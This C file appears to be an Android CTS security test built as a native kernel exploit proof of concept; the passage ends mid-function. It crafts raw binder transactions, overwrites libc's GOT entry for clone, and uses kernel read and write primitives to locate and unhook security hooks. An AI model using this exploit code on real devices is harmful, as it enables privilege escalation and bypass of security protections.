1 /*
2  * Copyright (C) 2019 The Android Open Source Project
3  *
4  * Licensed under the Apache License, Version 2.0 (the "License");
5  * you may not use this file except in compliance with the License.
6  * You may obtain a copy of the License at
7  *
8  *      http://www.apache.org/licenses/LICENSE-2.0
9  *
10  * Unless required by applicable law or agreed to in writing, software
11  * distributed under the License is distributed on an "AS IS" BASIS,
12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13  * See the License for the specific language governing permissions and
14  * limitations under the License.
15  */
16 
17 #define _GNU_SOURCE
18 #include <sys/mman.h>
19 #include <sys/types.h>
20 #include <sys/stat.h>
21 #include <sys/socket.h>
22 #include <sys/un.h>
23 #include <sys/prctl.h>
24 
25 #include <stdio.h>
26 #include <stdlib.h>
27 #include <string.h>
28 #include <syscall.h>
29 #include <pthread.h>
30 #include <dirent.h>
31 #include <unistd.h>
32 #include <fcntl.h>
33 #include <errno.h>
34 #include <sched.h>
35 #include <poll.h>
36 #include <elf.h>
37 
38 #include <cutils/log.h>
39 #include <cutils/properties.h>
40 #include <jni.h>
41 #include <linux/android/binder.h>
42 #include <cpu-features.h>
43 
44 #include "../../../../hostsidetests/securitybulletin/securityPatch/includes/common.h"
45 
46 typedef uint8_t u8;
47 typedef uint16_t u16;
48 typedef uint32_t u32;
49 typedef uint64_t u64;
50 typedef int64_t s64;
51 
52 jobject this;
53 jmethodID add_log;
54 JavaVM *jvm;
55 
56 #define MAX_THREADS 10
57 
58 struct tid_jenv {
59     int tid;
60     JNIEnv *env;
61 };
62 struct tid_jenv tid_jenvs[MAX_THREADS];
63 int num_threads;
64 
65 int gettid() {
66     return (int)syscall(SYS_gettid);
67 }
68 
69 void fail(char *msg, ...);
70 
71 void add_jenv(JNIEnv *e) {
72     if (num_threads >= MAX_THREADS) {
73         fail("too many threads");
74         return;
75     }
76     struct tid_jenv *te = &tid_jenvs[num_threads++];
77     te->tid = gettid();
78     te->env = e;
79 }
80 
81 JNIEnv *get_jenv() {
82     int tid = gettid();
83     for (int i = 0; i < num_threads; i++) {
84         struct tid_jenv *te = &tid_jenvs[i];
85         if (te->tid == tid)
86             return te->env;
87     }
88     return NULL;
89 }
90 
91 void jni_attach_thread() {
92     JNIEnv *env;
93     (*jvm)->AttachCurrentThread(jvm, &env, NULL);
94     add_jenv(env);
95 }
96 
97 pthread_mutex_t log_mut = PTHREAD_MUTEX_INITIALIZER;
98 pthread_cond_t log_pending = PTHREAD_COND_INITIALIZER;
99 pthread_cond_t log_done = PTHREAD_COND_INITIALIZER;
100 volatile char *log_line;
101 
102 void send_log_thread(char *msg) {
103     pthread_mutex_lock(&log_mut);
104     while (log_line)
105         pthread_cond_wait(&log_done, &log_mut);
106     log_line = msg;
107     pthread_cond_signal(&log_pending);
108     pthread_mutex_unlock(&log_mut);
109 }
110 
111 void dbg(char *msg, ...);
112 
113 void log_thread(u64 arg) {
114     while (1) {
115         pthread_mutex_lock(&log_mut);
116         while (!log_line)
117             pthread_cond_wait(&log_pending, &log_mut);
118         dbg("%s", log_line);
119         free((void*)log_line);
120         log_line = NULL;
121         pthread_cond_signal(&log_done);
122         pthread_mutex_unlock(&log_mut);
123     }
124 }
125 
126 void dbg(char *msg, ...) {
127     char *line;
128     va_list va;
129     JNIEnv *env = get_jenv();
130     va_start(va, msg);
131     if (vasprintf(&line, msg, va) >= 0) {
132         if (env) {
133             jstring jline = (*env)->NewStringUTF(env, line);
134             (*env)->CallVoidMethod(env, this, add_log, jline);
135             free(line);
136         } else {
137             send_log_thread(line);
138         }
139     }
140     va_end(va);
141 }
142 
143 void fail(char *msg, ...) {
144     char *line;
145     va_list va;
146     va_start(va, msg);
147     if (vasprintf(&line, msg, va) >= 0)
148         dbg("FAIL: %s (errno=%d)", line, errno);
149     va_end(va);
150 }
151 
152 struct buffer {
153     char *p;
154     u32 size;
155     u32 off;
156 };
157 
158 typedef struct buffer buf_t;
159 
160 struct parser {
161     u8 *buf;
162     u8 *p;
163     u32 size;
164 };
165 
166 typedef struct parser parser_t;
167 
168 parser_t *new_parser() {
169     parser_t *ret = malloc(sizeof(parser_t));
170     ret->size = 0x400;
171     ret->buf = ret->p = malloc(ret->size);
172     return ret;
173 }
174 
175 void free_parser(parser_t *parser) {
176     free(parser->buf);
177     free(parser);
178 }
179 
180 int parser_end(parser_t *p) {
181     return !p->size;
182 }
183 
184 void *parser_get(parser_t *p, u32 sz) {
185     if (sz > p->size) {
186         fail("parser size exceeded");
187         return NULL;
188     }
189     p->size -= sz;
190     u8 *ret = p->p;
191     p->p += sz;
192     return ret;
193 }
194 
195 u32 parse_u32(parser_t *p) {
196     u32 *pu32 = parser_get(p, sizeof(u32));
197     return (pu32 == NULL) ? (u32)-1 : *pu32;
198 }
199 
200 buf_t *new_buf_sz(u32 sz) {
201     buf_t *b = malloc(sizeof(buf_t));
202     b->size = sz;
203     b->off = 0;
204     b->p = malloc(sz);
205     return b;
206 }
207 
208 buf_t *new_buf() {
209     return new_buf_sz(0x200);
210 }
211 
212 void free_buf(buf_t *buf) {
213     free(buf->p);
214     free(buf);
215 }
216 
217 void *buf_alloc(buf_t *b, u32 s) {
218     s = (s + 3) & ~3;
219     if (b->size - b->off < s)
220         fail("out of buf space");
221     char *ret = b->p + b->off;
222     b->off += s;
223     memset(ret, 0x00, s);
224     return ret;
225 }
226 
227 void buf_u32(buf_t *b, u32 v) {
228     char *p = buf_alloc(b, sizeof(u32));
229     *(u32*)p = v;
230 }
231 
232 void buf_u64(buf_t *b, u64 v) {
233     char *p = buf_alloc(b, sizeof(u64));
234     *(u64*)p = v;
235 }
236 
237 void buf_uintptr(buf_t *b, u64 v) {
238     char *p = buf_alloc(b, sizeof(u64));
239     *(u64*)p = v;
240 }
241 
242 void buf_str16(buf_t *b, const char *s) {
243     if (!s) {
244         buf_u32(b, 0xffffffff);
245         return;
246     }
247     u32 len = strlen(s);
248     buf_u32(b, len);
249     u16 *dst = (u16*)buf_alloc(b, (len + 1) * 2);
250     for (u32 i = 0; i < len; i++)
251         dst[i] = s[i];
252     dst[len] = 0;
253 }
254 
255 void buf_binder(buf_t *b, buf_t *off, void *ptr) {
256     buf_u64(off, b->off);
257     struct flat_binder_object *fp = buf_alloc(b, sizeof(*fp));
258     fp->hdr.type = BINDER_TYPE_BINDER;
259     fp->flags = FLAT_BINDER_FLAG_ACCEPTS_FDS;
260     fp->binder = (u64)ptr;
261     fp->cookie = 0;
262 }
263 
264 static inline void binder_write(int fd, buf_t *buf);
265 
266 void enter_looper(int fd) {
267     buf_t *buf = new_buf();
268     buf_u32(buf, BC_ENTER_LOOPER);
269     binder_write(fd, buf);
270 }
271 
272 void init_binder(int fd) {
273     void *map_ret = mmap(NULL, 0x200000, PROT_READ, MAP_PRIVATE, fd, 0);
274     if (map_ret == MAP_FAILED)
275         fail("map fail");
276     enter_looper(fd);
277 }
278 
279 int open_binder() {
280     int fd = open("/dev/binder", O_RDONLY);
281     if (fd < 0)
282         fail("open binder fail");
283     init_binder(fd);
284     return fd;
285 }
286 
287 static inline void binder_rw(int fd, void *rbuf, u32 rsize,
288         void *wbuf, u32 wsize, u32 *read_consumed, u32 *write_consumed) {
289     struct binder_write_read bwr;
290     memset(&bwr, 0x00, sizeof(bwr));
291     bwr.read_buffer = (u64)rbuf;
292     bwr.read_size = rsize;
293     bwr.write_buffer = (u64)wbuf;
294     bwr.write_size = wsize;
295     if (ioctl(fd, BINDER_WRITE_READ, &bwr) < 0)
296         fail("binder ioctl fail");
297     if (read_consumed)
298         *read_consumed = bwr.read_consumed;
299     if (write_consumed)
300         *write_consumed = bwr.write_consumed;
301 }
302 
303 void binder_read(int fd, void *rbuf, u32 rsize, u32 *read_consumed) {
304     binder_rw(fd, rbuf, rsize, 0, 0, read_consumed, NULL);
305 }
306 
307 static inline void binder_write(int fd, buf_t *buf) {
308     u32 write_consumed;
309     binder_rw(fd, 0, 0, buf->p, buf->off, NULL, &write_consumed);
310     if (write_consumed != buf->off)
311         fail("binder write fail");
312     free_buf(buf);
313 }
314 
315 void do_send_txn(int fd, u32 to, u32 code, buf_t *trdat, buf_t *troff, int oneway, int is_reply, binder_size_t extra_sz) {
316     buf_t *buf = new_buf();
317     buf_u32(buf, is_reply ? BC_REPLY_SG : BC_TRANSACTION_SG);
318     struct binder_transaction_data_sg *tr;
319     tr = buf_alloc(buf, sizeof(*tr));
320     struct binder_transaction_data *trd = &tr->transaction_data;
321     trd->target.handle = to;
322     trd->code = code;
323     if (oneway)
324         trd->flags |= TF_ONE_WAY;
325     trd->data.ptr.buffer = trdat ? (u64)trdat->p : 0;
326     trd->data.ptr.offsets = troff ? (u64)troff->p : 0;
327     trd->data_size = trdat ? trdat->off : 0;
328     trd->offsets_size = troff ? troff->off : 0;
329     tr->buffers_size = extra_sz;
330     binder_write(fd, buf);
331     if (trdat)
332         free_buf(trdat);
333     if (troff)
334         free_buf(troff);
335 }
336 
337 void send_txn(int fd, u32 to, u32 code, buf_t *trdat, buf_t *troff) {
338     do_send_txn(fd, to, code, trdat, troff, 0, 0, 0);
339 }
340 
341 void send_reply(int fd) {
342     do_send_txn(fd, 0, 0, NULL, NULL, 0, 1, 0);
343 }
344 
345 static inline void chg_ref(int fd, unsigned desc, u32 cmd) {
346     buf_t *buf = new_buf();
347     buf_u32(buf, cmd);
348     buf_u32(buf, desc);
349     binder_write(fd, buf);
350 }
351 
352 void inc_ref(int fd, unsigned desc) {
353     chg_ref(fd, desc, BC_ACQUIRE);
354 }
355 
356 void dec_ref(int fd, unsigned desc) {
357     chg_ref(fd, desc, BC_RELEASE);
358 }
359 
360 static inline void free_buffer(int fd, u64 ptr) {
361     buf_t *buf = new_buf();
362     buf_u32(buf, BC_FREE_BUFFER);
363     buf_uintptr(buf, ptr);
364     binder_write(fd, buf);
365 }
366 
367 typedef struct {
368     int fd;
369     char *buf;
370     binder_size_t size;
371     binder_size_t parsed;
372     binder_size_t *offsets;
373     binder_size_t num_offsets;
374     u32 code;
375     u64 ptr;
376 } txn_t;
377 
378 void *txn_get(txn_t *t, u32 sz) {
379     sz = (sz + 3) & ~3u;
380     if (sz > t->size - t->parsed)
381         fail("txn get not enough data");
382     char *ret = t->buf + t->parsed;
383     t->parsed += sz;
384     return ret;
385 }
386 
387 binder_size_t txn_offset(txn_t *t) {
388     return t->parsed;
389 }
390 
391 void txn_set_offset(txn_t *t, binder_size_t off) {
392     t->parsed = off;
393 }
394 
395 u32 txn_u32(txn_t *t) {
396     return *(u32*)txn_get(t, sizeof(u32));
397 }
398 
399 int txn_int(txn_t *t) {
400     return *(int*)txn_get(t, sizeof(int));
401 }
402 
403 u32 txn_handle(txn_t *t) {
404     struct flat_binder_object *fp;
405     fp = txn_get(t, sizeof(*fp));
406     if (fp->hdr.type != BINDER_TYPE_HANDLE)
407         fail("expected binder");
408     return fp->handle;
409 }
410 
411 u16 *txn_str(txn_t *t) {
412     int len = txn_int(t);
413     if (len == -1)
414         return NULL;
415     if (len > 0x7fffffff / 2 - 1)
416         fail("bad txn str len");
417     return txn_get(t, (len + 1) * 2);
418 }
419 
420 static inline u64 txn_buf(txn_t *t) {
421     return (u64)t->buf;
422 }
423 
424 void free_txn(txn_t *txn) {
425     free_buffer(txn->fd, txn_buf(txn));
426 }
427 
428 
429 void handle_cmd(int fd, u32 cmd, void *dat) {
430     if (cmd == BR_ACQUIRE || cmd == BR_INCREFS) {
431         struct binder_ptr_cookie *pc = dat;
432         buf_t *buf = new_buf();
433         u32 reply = cmd == BR_ACQUIRE ? BC_ACQUIRE_DONE : BC_INCREFS_DONE;
434         buf_u32(buf, reply);
435         buf_uintptr(buf, pc->ptr);
436         buf_uintptr(buf, pc->cookie);
437         binder_write(fd, buf);
438     }
439 }
440 
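// Drains the binder read buffer until a BR_TRANSACTION or BR_REPLY arrives,
// acknowledging BR_ACQUIRE/BR_INCREFS along the way (via handle_cmd) and
// filling in *t from the received binder_transaction_data.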
441 void recv_txn(int fd, txn_t *t) {
442     u32 found = 0;
443     while (!found) {
444         parser_t *p = new_parser();
445         binder_read(fd, p->p, p->size, &p->size);
446         while (!parser_end(p)) {
447             u32 cmd = parse_u32(p);
448             void *dat = (void *)parser_get(p, _IOC_SIZE(cmd));
449             if (dat == NULL) {
450                 return;
451             }
452             handle_cmd(fd, cmd, dat);
453             if (cmd == BR_TRANSACTION || cmd == BR_REPLY) {
454                 struct binder_transaction_data *tr = dat;
455                 if (!parser_end(p))
456                     fail("expected parser end");
457                 t->fd = fd;
458                 t->buf = (char*)tr->data.ptr.buffer;
459                 t->parsed = 0;
460                 t->size = tr->data_size;
461                 t->offsets = (binder_size_t*)tr->data.ptr.offsets;
462                 t->num_offsets = tr->offsets_size / sizeof(binder_size_t);
463                 t->code = tr->code;
464                 t->ptr = tr->target.ptr;
465                 found = 1;
466             }
467         }
468         free_parser(p);
469     }
470 }
471 
472 u32 recv_handle(int fd) {
473     txn_t txn;
474     recv_txn(fd, &txn);
475     u32 hnd = txn_handle(&txn);
476     inc_ref(fd, hnd);
477     free_txn(&txn);
478     return hnd;
479 }
480 
481 u32 get_activity_svc(int fd) {
482     buf_t *trdat = new_buf();
483     buf_u32(trdat, 0); // policy
484     buf_str16(trdat, "android.os.IServiceManager");
485     buf_str16(trdat, "activity");
486     int SVC_MGR_GET_SERVICE = 1;
487     send_txn(fd, 0, SVC_MGR_GET_SERVICE, trdat, NULL);
488     return recv_handle(fd);
489 }
490 
491 void txn_part(txn_t *t) {
492     int repr = txn_int(t);
493     if (repr == 0) {
494         txn_str(t);
495         txn_str(t);
496     } else if (repr == 1 || repr == 2) {
497         txn_str(t);
498     } else {
499         fail("txn part bad repr");
500     }
501 }
502 
503 void txn_uri(txn_t *t) {
504     int type = txn_int(t);
505     if (type == 0) // NULL_TYPE_ID
506         return;
507     if (type == 1) { // StringUri.TYPE_ID
508         txn_str(t);
509     } else if (type == 2) {
510         txn_str(t);
511         txn_part(t);
512         txn_part(t);
513     } else if (type == 3) {
514         txn_str(t);
515         txn_part(t);
516         txn_part(t);
517         txn_part(t);
518         txn_part(t);
519     } else {
520         fail("txn uri bad type");
521     }
522 }
523 
524 void txn_component(txn_t *t) {
525     u16 *pkg = txn_str(t);
526     if (pkg)
527         txn_str(t); // class
528 }
529 
530 void txn_rect(txn_t *t) {
531     txn_int(t);
532     txn_int(t);
533     txn_int(t);
534     txn_int(t);
535 }
536 
537 int str16_eq(u16 *s16, char *s) {
538     while (*s) {
539         if (*s16++ != *s++)
540             return 0;
541     }
542     return !*s16;
543 }
544 
545 void txn_bundle(txn_t *t, u32 *hnd) {
546     int len = txn_int(t);
547     if (len < 0)
548         fail("bad bundle len");
549     if (len == 0)
550         return;
551     int magic = txn_int(t);
552     if (magic != 0x4c444e42 && magic != 0x4c444e44)
553         fail("bad bundle magic");
554     binder_size_t off = txn_offset(t);
555     int count = txn_int(t);
556     if (count == 1) {
557         u16 *key = txn_str(t);
558         int type = txn_int(t);
559         if (str16_eq(key, "bnd") && type == 15)
560             *hnd = txn_handle(t);
561     }
562     txn_set_offset(t, off);
563     txn_get(t, len);
564 }
565 
566 void txn_intent(txn_t *t, u32 *hnd) {
567     txn_str(t); // action
568     txn_uri(t);
569     txn_str(t); // type
570     txn_int(t); // flags
571     txn_str(t); // package
572     txn_component(t);
573     if (txn_int(t)) // source bounds
574         txn_rect(t);
575     int n = txn_int(t);
576     if (n > 0) {
577         for (int i = 0; i < n; i++)
578             txn_str(t);
579     }
580     if (txn_int(t)) // selector
581         txn_intent(t, NULL);
582     if (txn_int(t))
583         fail("unexpected clip data");
584     txn_int(t); // content user hint
585     txn_bundle(t, hnd); // extras
586 }
587 
588 void get_task_info(int fd, u32 app_task, u32 *hnd) {
589     buf_t *trdat = new_buf();
590     buf_u32(trdat, 0); // policy
591     buf_str16(trdat, "android.app.IAppTask");
592     send_txn(fd, app_task, 1 + 1, trdat, NULL);
593     txn_t txn;
594     recv_txn(fd, &txn);
595     if (txn_u32(&txn) != 0)
596         fail("getTaskInfo exception");
597     if (txn_int(&txn) == 0)
598         fail("getTaskInfo returned null");
599     txn_int(&txn); // id
600     txn_int(&txn); // persistent id
601     if (txn_int(&txn) > 0) // base intent
602         txn_intent(&txn, hnd);
603     if (*hnd != ~0u)
604         inc_ref(fd, *hnd);
605     free_txn(&txn);
606 }
607 
608 u32 get_app_tasks(int fd, u32 actsvc) {
609     buf_t *trdat = new_buf();
610     buf_u32(trdat, 0); // policy
611     buf_str16(trdat, "android.app.IActivityManager");
612     buf_str16(trdat, "android.security.cts");
613     send_txn(fd, actsvc, 1 + 199, trdat, NULL);
614     txn_t txn;
615     recv_txn(fd, &txn);
616     if (txn_u32(&txn) != 0)
617         fail("getAppTasks exception");
618     int n = txn_int(&txn);
619     if (n < 0)
620         fail("getAppTasks n < 0");
621     u32 hnd = ~0u;
622     for (int i = 0; i < n; i++) {
623         u32 app_task = txn_handle(&txn);
624         get_task_info(fd, app_task, &hnd);
625         if (hnd != ~0u)
626             break;
627     }
628     if (hnd == ~0u)
629         fail("didn't find intent extras binder");
630     free_txn(&txn);
631     return hnd;
632 }
633 
634 u32 get_exchg(int fd) {
635     u32 actsvc = get_activity_svc(fd);
636     u32 ret = get_app_tasks(fd, actsvc);
637     dec_ref(fd, actsvc);
638     return ret;
639 }
640 
641 int get_binder(u32 *exchg) {
642     int fd = open_binder();
643     *exchg = get_exchg(fd);
644     return fd;
645 }
646 
647 void exchg_put_binder(int fd, u32 exchg) {
648     buf_t *trdat = new_buf();
649     buf_t *troff = new_buf();
650     buf_u32(trdat, 0); // policy
651     buf_str16(trdat, "android.security.cts.IBinderExchange");
652     buf_binder(trdat, troff, (void*)1);
653     send_txn(fd, exchg, 1, trdat, troff);
654     txn_t txn;
655     recv_txn(fd, &txn);
656     free_txn(&txn);
657 }
658 
659 u32 exchg_get_binder(int fd, u32 exchg) {
660     buf_t *trdat = new_buf();
661     buf_u32(trdat, 0); // policy
662     buf_str16(trdat, "android.security.cts.IBinderExchange");
663     send_txn(fd, exchg, 2, trdat, NULL);
664     txn_t txn;
665     recv_txn(fd, &txn);
666     if (txn_u32(&txn) != 0)
667         fail("getBinder exception");
668     u32 hnd = txn_handle(&txn);
669     inc_ref(fd, hnd);
670     free_txn(&txn);
671     return hnd;
672 }
673 
674 void set_idle() {
675   struct sched_param param = {
676     .sched_priority = 0
677   };
678   if (sched_setscheduler(0, SCHED_IDLE, &param) < 0)
679     fail("sched_setscheduler fail");
680 }
681 
682 int do_set_cpu(int cpu) {
683     cpu_set_t set;
684     CPU_ZERO(&set);
685     CPU_SET(cpu, &set);
686     return sched_setaffinity(0, sizeof(set), &set);
687 }
688 
689 void set_cpu(int cpu) {
690     if (do_set_cpu(cpu) < 0)
691         fail("sched_setaffinity fail");
692 }
693 
694 struct sync {
695     pthread_cond_t cond;
696     pthread_mutex_t mutex;
697     volatile int triggered;
698     size_t num_waiters;
699     volatile size_t num_waited;
700     volatile size_t num_done;
701 };
702 
703 typedef struct sync sync_t;
704 
705 sync_t *alloc_sync() {
706     sync_t *ret = malloc(sizeof(sync_t));
707     if (pthread_mutex_init(&ret->mutex, NULL) ||
708         pthread_cond_init(&ret->cond, NULL))
709         fail("pthread init failed");
710     ret->triggered = 0;
711     ret->num_waiters = 1;
712     ret->num_waited = 0;
713     ret->num_done = 0;
714     return ret;
715 }
716 
717 void sync_set_num_waiters(sync_t *sync, size_t num_waiters) {
718     sync->num_waiters = num_waiters;
719 }
720 
721 void sync_pth_bc(sync_t *sync) {
722     if (pthread_cond_broadcast(&sync->cond) != 0)
723         fail("pthread_cond_broadcast failed");
724 }
725 
726 void sync_pth_wait(sync_t *sync) {
727     pthread_cond_wait(&sync->cond, &sync->mutex);
728 }
729 
730 void sync_wait(sync_t *sync) {
731     pthread_mutex_lock(&sync->mutex);
732     sync->num_waited++;
733     sync_pth_bc(sync);
734     while (!sync->triggered)
735         sync_pth_wait(sync);
736     pthread_mutex_unlock(&sync->mutex);
737 }
738 
739 void sync_signal(sync_t *sync) {
740     pthread_mutex_lock(&sync->mutex);
741     while (sync->num_waited != sync->num_waiters)
742         sync_pth_wait(sync);
743     sync->triggered = 1;
744     sync_pth_bc(sync);
745     pthread_mutex_unlock(&sync->mutex);
746 }
747 
748 void sync_done(sync_t *sync) {
749     pthread_mutex_lock(&sync->mutex);
750     sync->num_done++;
751     sync_pth_bc(sync);
752     while (sync->triggered)
753         sync_pth_wait(sync);
754     pthread_mutex_unlock(&sync->mutex);
755 }
756 
757 void sync_wait_done(sync_t *sync) {
758     pthread_mutex_lock(&sync->mutex);
759     while (sync->num_done != sync->num_waiters)
760         sync_pth_wait(sync);
761     sync->triggered = 0;
762     sync->num_waited = 0;
763     sync->num_done = 0;
764     sync_pth_bc(sync);
765     pthread_mutex_unlock(&sync->mutex);
766 }
767 
768 static inline void ns_to_timespec(u64 t, struct timespec *ts) {
769     const u64 k = 1000000000;
770     ts->tv_sec = t / k;
771     ts->tv_nsec = t % k;
772 }
773 
774 static inline u64 timespec_to_ns(volatile struct timespec *t) {
775      return (u64)t->tv_sec * 1000000000 + t->tv_nsec;
776 }
777 
778 static inline u64 time_now() {
779     struct timespec now;
780     if (clock_gettime(CLOCK_MONOTONIC, &now) < 0)
781         fail("clock_gettime failed");
782     return timespec_to_ns(&now);
783 }
784 
785 static inline void sleep_until(u64 t) {
786     struct timespec wake;
787     ns_to_timespec(t, &wake);
788     int ret = clock_nanosleep(CLOCK_MONOTONIC, TIMER_ABSTIME, &wake, NULL);
789     if (ret && ret != EINTR)
790         fail("clock_nanosleep failed");
791 }
792 
793 void set_thread_name(const char *name) {
794     if (prctl(PR_SET_NAME, name) < 0)
795         fail("pr_set_name fail");
796 }
797 
798 void set_timerslack() {
799     char path[64];
800     sprintf(path, "/proc/%d/timerslack_ns", gettid());
801     int fd = open(path, O_WRONLY);
802     if (fd < 0)
803         fail("open timerslack fail");
804     if (write(fd, "1\n", 2) != 2)
805         fail("write timerslack fail");
806     close(fd);
807 }
808 
809 struct launch_dat {
810     u64 arg;
811     void (*func)(u64);
812     int attach_jni;
813     const char *name;
814 };
815 
816 void *thread_start(void *vdat) {
817     struct launch_dat *dat = vdat;
818     if (dat->attach_jni)
819         jni_attach_thread();
820     set_thread_name(dat->name);
821     void (*func)(u64) = dat->func;
822     u64 arg = dat->arg;
823     free(dat);
824     (*func)(arg);
825     return NULL;
826 }
827 
828 int launch_thread(const char *name, void (*func)(u64), sync_t **sync, u64 arg,
829         int attach_jni) {
830     if (sync)
831         *sync = alloc_sync();
832     struct launch_dat *dat = malloc(sizeof(*dat));
833     dat->func = func;
834     dat->arg = arg;
835     dat->attach_jni = attach_jni;
836     dat->name = name;
837     pthread_t th;
838     if (pthread_create(&th, NULL, thread_start, dat) != 0)
839         fail("pthread_create failed");
840     return pthread_gettid_np(th);
841 }
842 
843 void *map_path(const char *path, u64 *size) {
844     int fd = open(path, O_RDONLY);
845     if (fd < 0)
846         fail("open libc fail");
847     struct stat st;
848     if (fstat(fd, &st) < 0)
849         fail("fstat fail");
850     void *map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
851     if (map == MAP_FAILED)
852         fail("mmap libc fail");
853     *size = st.st_size;
854     close(fd);
855     return map;
856 }
857 
858 typedef Elf64_Ehdr ehdr_t;
859 typedef Elf64_Shdr shdr_t;
860 typedef Elf64_Rela rela_t;
861 typedef Elf64_Sym sym_t;
862 
863 shdr_t *find_rela_plt(void *elf) {
864     ehdr_t *ehdr = (ehdr_t *)elf;
865     shdr_t *shdr = ((shdr_t *)elf) + ehdr->e_shoff;
866     char *shstr = ((char *)elf) + shdr[ehdr->e_shstrndx].sh_offset;
867     for (u64 i = 0; i < ehdr->e_shnum; i++) {
868         char *name = shstr + shdr[i].sh_name;
869         if (strcmp(name, ".rela.plt") == 0)
870             return &shdr[i];
871     }
872     fail("didn't find .rela.plt");
873     return NULL;
874 }
875 
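// Maps the given library and walks its .rela.plt for the relocation of the
// "clone" symbol; the returned r_offset is clone()'s GOT slot relative to the
// library's load address (0 on failure).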
876 u64 find_elf_clone_got(const char *path) {
877     u64 mapsz;
878     void *elf = map_path(path, &mapsz);
879     ehdr_t *ehdr = (ehdr_t *)elf;
880     shdr_t *shdr = ((shdr_t *)elf) + ehdr->e_shoff;
881     shdr_t *rphdr = find_rela_plt(elf);
882     if (rphdr == NULL) {
883         return (u64)0;
884     }
885     shdr_t *symhdr = &shdr[rphdr->sh_link];
886     shdr_t *strhdr = &shdr[symhdr->sh_link];
887     sym_t *sym = ((sym_t *)elf) + symhdr->sh_offset;
888     char *str = ((char *)elf) + strhdr->sh_offset;
889     rela_t *r = ((rela_t *)elf) + rphdr->sh_offset;
890     rela_t *end = r + rphdr->sh_size / sizeof(rela_t);
891     u64 ret = 0;
892     for (; r < end; r++) {
893         sym_t *s = &sym[ELF64_R_SYM(r->r_info)];
894         if (strcmp(str + s->st_name, "clone") == 0) {
895             ret = r->r_offset;
896             break;
897         }
898     }
899     if (!ret) {
900         fail("clone rela not found");
901         return (u64)0;
902     }
903     if (munmap(elf, mapsz) < 0) {
904         fail("munmap fail");
905         return (u64)0;
906     }
907     return ret;
908 }
909 
910 int hook_tid;
911 int (*real_clone)(u64 a, u64 b, int flags, u64 c, u64 d, u64 e, u64 f);
912 
913 int clone_unshare_files(u64 a, u64 b, int flags, u64 c, u64 d, u64 e, u64 f) {
914     if (gettid() == hook_tid)
915         flags &= ~CLONE_FILES;
916     return (*real_clone)(a, b, flags, c, d, e, f);
917 }
918 
919 void unshare_following_clone_files() {
920     hook_tid = gettid();
921 }
922 
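// Scans backwards from clone() until libc's ELF magic is found, then patches
// libc's GOT entry for clone() to point at clone_unshare_files(). The thread
// that last called unshare_following_clone_files() thereafter creates children
// without CLONE_FILES, i.e. with a private fd table.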
923 void hook_clone() {
924     void *p = (void*)((uintptr_t)clone & ~0xffful);
925     while (*(u32*)p != 0x464c457f)
926         p = (void *)(((u32 *)p) - 0x1000);
927     u64 *got = ((u64 *)p) + find_elf_clone_got("/system/lib64/libc.so");
928     if (*got != (u64)clone)
929         fail("bad got");
930     real_clone = (void*)clone;
931     void *page = (void*)((u64)got & ~0xffful);
932     if (mprotect(page, 0x1000, PROT_READ | PROT_WRITE) < 0) {
933         fail("got mprotect fail");
934         return;
935     }
936     *got = (u64)clone_unshare_files;
937 }
938 
939 u32 r32(u64 addr);
940 u64 r64(u64 addr);
941 void w64(u64 addr, u64 val);
942 void w128(u64 addr, u64 v1, u64 v2);
943 u64 scratch;
944 u64 rw_task;
945 u64 current;
946 u64 fdarr;
947 
948 void hlist_del(u64 node) {
949     u64 next = r64(node);
950     u64 pprev = r64(node + 8);
951     if (r64(pprev) != node) {
952         fail("bad hlist");
953         return;
954     }
955     w64(pprev, next);
956     if (next)
957         w64(next + 8, pprev);
958 }
959 
960 u64 get_file(int fd) {
961     return r64(fdarr + fd * 8);
962 }
963 
964 u64 first_bl(u64 func) {
965     for (int i = 0; i < 30; i++) {
966         u32 inst = r32(func + i * 4);
967         if ((inst >> 26) == 0x25) { // bl
968             s64 off = inst & ((1u << 26) - 1);
969             off <<= 64 - 26;
970             off >>= 64 - 26;
971             return func + i * 4 + off * 4;
972         }
973     }
974     fail("bl not found");
975     return (u64)-1;
976 }
977 
978 int is_adrp(u32 inst) {
979     return ((inst >> 24) & 0x9f) == 0x90;
980 }
981 
982 u64 parse_adrp(u64 p, u32 inst) {
983     s64 off = ((inst >> 5) & ((1u << 19) - 1)) << 2;
984     off |= (inst >> 29) & 3;
985     off <<= (64 - 21);
986     off >>= (64 - 21 - 12);
987     return (p & ~0xffful) + off;
988 }
989 
990 u64 find_adrp_add(u64 addr) {
991     time_t test_started = start_timer();
992     while (timer_active(test_started)) {
993         u32 inst = r32(addr);
994         if (is_adrp(inst)) {
995             u64 ret = parse_adrp(addr, inst);
996             inst = r32(addr + 4);
997             if ((inst >> 22) != 0x244) {
998                 fail("not add after adrp");
999                 return (u64)-1;
1000             }
1001             ret += (inst >> 10) & ((1u << 12) - 1);
1002             return ret;
1003         }
1004         addr += 4;
1005     }
1006     fail("adrp add not found");
1007     return (u64)-1;
1008 }
1009 
1010 u64 locate_hooks() {
1011     char path[256];
1012     DIR *d = opendir("/proc/self/map_files");
1013     char *p;
1014     while (1) {
1015         struct dirent *l = readdir(d);
1016         if (!l)
1017             fail("readdir fail");
1018         p = l->d_name;
1019         if (strcmp(p, ".") && strcmp(p, ".."))
1020             break;
1021     }
1022     sprintf(path, "/proc/self/map_files/%s", p);
1023     closedir(d);
1024     int fd = open(path, O_PATH | O_NOFOLLOW | O_RDONLY);
1025     if (fd < 0)
1026         fail("link open fail");
1027     struct stat st;
1028     if (fstat(fd, &st) < 0)
1029         fail("fstat fail");
1030     if (!S_ISLNK(st.st_mode))
1031         fail("link open fail");
1032     u64 file = get_file(fd);
1033     u64 inode = r64(file + 0x20);
1034     u64 iop = r64(inode + 0x20);
1035     u64 follow_link = r64(iop + 8);
1036     u64 cap = first_bl(follow_link);
1037     u64 scap = first_bl(cap);
1038     if (cap == (u64)-1 || scap == (u64)-1) {
1039         dbg("cap=%016zx", cap);
1040         dbg("scap=%016zx", scap);
1041         return (u64)-1;
1042     }
1043     u64 hooks = find_adrp_add(scap);
1044     close(fd);
1045     dbg("hooks=%016zx", hooks);
1046     return hooks;
1047 }
1048 
1049 void unhook(u64 hooks, int idx) {
1050     u64 hook = hooks + idx * 0x10;
1051     w128(hook, hook, hook);
1052 }
1053 
1054 u64 locate_avc(u64 hooks) {
1055     u64 se_file_open = r64(r64(hooks + 0x490) + 0x18);
1056     u64 seqno = first_bl(se_file_open);
1057     if (seqno == (u64)-1) {
1058         dbg("seqno=%016zx", seqno);
